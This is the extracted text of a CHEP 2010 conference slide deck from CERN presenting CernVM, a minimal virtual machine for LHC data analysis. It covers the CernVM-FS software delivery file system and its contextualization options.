CHEP 2010 Taipei, 19 October Predrag Buncic Jakob Blomer, Carlos Aguado Sanchez, Pere Mato, Artem Harutyunyan CERN/PH-SFT CernVM: Minimal Maintenance Approach to the Virtualization

CHEP 2010 Taipei, 19 October Aims to provide a complete, portable and easy to configure user environment in form of a Virtual Machine for developing and running LHC data analysis locally and on the Grid independent of physical software and hardware platform (Linux, Windows, MacOS)  Code check-out, edition, compilation, local small test, debugging, …  Grid submission, data access…  Event displays, interactive data analysis, …  Suspend, resume… Project started 01/01/2008, funded for 4 years Web site: CernVM R&D Project

CHEP 2010 Taipei, 19 October CernVM Users ~3250 different IP addresses

CHEP 2010 Taipei, 19 October CernVM Usage History

CHEP 2010 Taipei, 19 October Next step PCMac Linux

CHEP 2010 Taipei, 19 October Is CernVM suitable for deployment on Grid infrastructure? What are the benefits of going CernVM way comparing to more traditional 1) approach to batch node virtualization? 1)Traditional approach: Take “standard” batch node [2GB] and add experiment software [10GB] and generate VM image. Have experiment and security team certify the image, deploy it to all sites and worker nodes. Repeat this procedure 1-2 times per week and per experiment.

CHEP 2010 Taipei, 19 October Minimal Linux OS (SL5) 2. CernVM-FS - HTTP network file system optimized for jus in time delivery of experiment software 3. Configuration and contextualization mechanism CernVM Way

CHEP 2010 Taipei, 19 October Part #1: Minimal OS image Just enough OS to run LHC applications Built using commercial tool (rBuilder by rPath)  Top-down approach - starting from application and automatically discovering dependencies Small images (250MB), easy to move around

CHEP 2010 Taipei, 19 October rpm - imported or encapsulated into conary package Amazon AMI VMware, VirtualBox, QEMU, KVM, Parallels, HyperV, Xen x86, x86_64 … rBuilder  Initially conceived targeting ISVs (Independent Software vendors) Evolving toward end-to-end solution for process automation  Supports component and image Development -> QA -> Release cycles  Supports deployment of built images on multiple cloud back-ends  Provides several upstream platforms (CentOS, Ubunty, RHEL, rPath Linux, SL5) on which appliance can be based

CHEP 2010 Taipei, 19 October Repository Versioning conary package manager  inspects every file on the system, detects dependencies, stores application binaries and sources into database and automatically versions components  allows updates, rollbacks and can reproduce exact system configuration at any time using multiple public and private repositories

CHEP 2010 Taipei, 19 October Built in OS update mechanism Minimal OS configuration translates into less frequent needs for updates and results in more secure virtual environment

CHEP 2010 Taipei, 19 October  Experiment software is changing frequently and we want to avoid need to frequently update, certify and redistribute VM images with every release  Only a small fraction of software release is really used  CernVM-FS: Read-only, network (HTTP) file system optimized for efficient software delivery. See: J.Blomer (PS )PS ) Part #2: CernVM-FS

CHEP 2010 Taipei, 19 October CernVM-FS 0.48  Deployable on Virtual and Physical machines  Aggressively caches files and supports offline use  Performance equal or better than NFS on LAN, better than AFS on WAN

CHEP 2010 Taipei, 19 October Security & Integrity Catalogs can be signed with X.509 certificate File integrity is verified on download using SHA1 checksum Access control (requiring users to register their VMs) could be implemented

CHEP 2010 Taipei, 19 October Proxy Server Proxy Server Proxy Server Proxy Server CernVM HTTP server HTTP server HTTP server HTTP server Proxy Server Proxy Server Scalability Proxy and slave servers could be deployed on strategic locations to reduce latency and provide redundancy Working with ATLAS & CMS Frontier teams to reuse already deployed squid proxy infrastructure

CHEP 2010 Taipei, 19 October CernVM-FS Summary Separation of responsibilities  We manage and certify VM, experiment manages VO software  VO s/w managers are not given access to VM image  Software installation and testing can be done prior to publishing in exactly the same environment as it will be seen by end use Automated configuration  CernVM-FS is automatically adjusts its configuration parameters based on client’s current location  CernVM clients automatically receive software updates No need for s/w installation/configuration that can easily go wrong Reduced load on experiment support teams Use of standard tools and protocols  Network friendly, scalable cache on client side, site squid caches, CDN.. Security and data integrity  Repository catalogue have checksums are signed and all files have checksums verified on download

CHEP 2010 Taipei, 19 October There are several ways to contextualize CernVM  Web UI (for individual user)  amiconfig (for Amazon EC2 user)  CernVM Contextualization Agent  Hepix CDROM method Part #3: Contextualization

CHEP 2010 Taipei, 19 October Login to Web interface 2. Create user account 3. Select experiment, appliance flavor and preferences As easy as 1,2,3

CHEP 2010 Taipei, 19 October [cernvm] organisations = cms repositories = cms,grid users = cms:cms command = cms:/opt/cms/etc/gladein Environment = CMS_ROOT=/opt/cms

CHEP 2010 Taipei, 19 October Contextualization Summary Basic principles:  Owner of VM instance can contextualize and configure it to run arbitrary service as unprivileged user  Site can use HEPIX method to inject monitoring and accounting hooks w/o functionally modifying the image  If such VM is used to host 3rd party jobs (pilot frameworks) they should run as unprivileged user Wide range of contextualization options does not necessarily compromise security  By allowing VM instances to be contextualized by their owners, we avoid need to build, distribute and audit many different instances  For more info on CernVM contextualization:

CHEP 2010 Taipei, 19 October Conclusions CernVM is gaining the trust of users making them comfortable with use of virtualization technology In combination with various contextualization options and CernVM-FS, just one small image can run frameworks of all LHC experiments and be easily moved around requiring far less updates than traditional SL5 worker node Strongly versioned repository provides full account of image content and allows upgrades and rollbacks CernVM-FS provides efficient, scalable, secure, standard and maintenance free way do distribute software in CernVM and physical nodes alike Flexible contextualization options allow the same small image to play different roles reducing the need for creation and certification of specialized images Using maximal process automation we derived minimal OS platform that is ready be deployed on various service infrastructures, does not require significant maintenance effort and does not compromise security

CHEP 2010 Taipei, 19 October Backup slides

CHEP 2010 Taipei, 19 October CernVM contextualization service h CHEP 2010 Taipei, October